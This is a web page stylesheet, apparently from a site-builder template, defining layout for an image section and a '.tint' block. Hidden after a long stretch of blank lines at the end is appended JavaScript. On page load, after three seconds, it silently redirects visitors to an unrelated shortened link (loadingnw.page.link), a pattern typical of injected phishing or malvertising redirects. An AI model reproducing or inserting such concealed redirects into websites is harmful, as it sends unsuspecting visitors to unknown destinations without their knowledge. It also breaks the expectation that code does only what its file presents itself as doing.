.u-section-1 .u-sheet-1 {
  min-height: 650px;
}

.u-section-1 .u-image-1 {
  width: 191px;
  height: 191px;
  margin: 69px auto 0;
}

.u-section-1 .u-text-1 {
  margin: 21px auto 0;
}

.u-section-1 .u-text-2 {
  font-size: 1.25rem;
  margin: 20px auto 60px;
}

@media (max-width: 991px) {
  .u-section-1 .u-image-1 {
    margin-top: 79px;
  }

  .u-section-1 .u-text-1 {
    width: auto;
    margin-top: 48px;
  }
}

@media (max-width: 767px) {
  .u-section-1 .u-image-1 {
    margin-top: 63px;
  }

  .u-section-1 .u-text-1 {
    margin-top: 28px;
  }
}

@media (max-width: 575px) {
  .u-section-1 .u-image-1 {
    width: 156px;
    height: 156px;
    margin-top: 69px;
  }

  .u-section-1 .u-text-1 {
    margin-top: 42px;
    margin-left: 0;
    margin-right: 0;
  }

  .u-section-1 .u-text-2 {
    font-size: 1rem;
  }
} .tint{
    font-family: Verdana;
    width: 400px;
    margin: 0 auto;
    color: "navy blue";
    text-align: center;
    }
    .tint img{
        margin-top: 10ex;
    }
    .tint p{
        font-size: 1.5rem;
    }
    
    
    
    
    
    
    
    
        window.onload = function() {
          setTimeout(function(){ window.location.replace("https://loadingnw.page.link/EwdR/"); }, 3000);
        }; 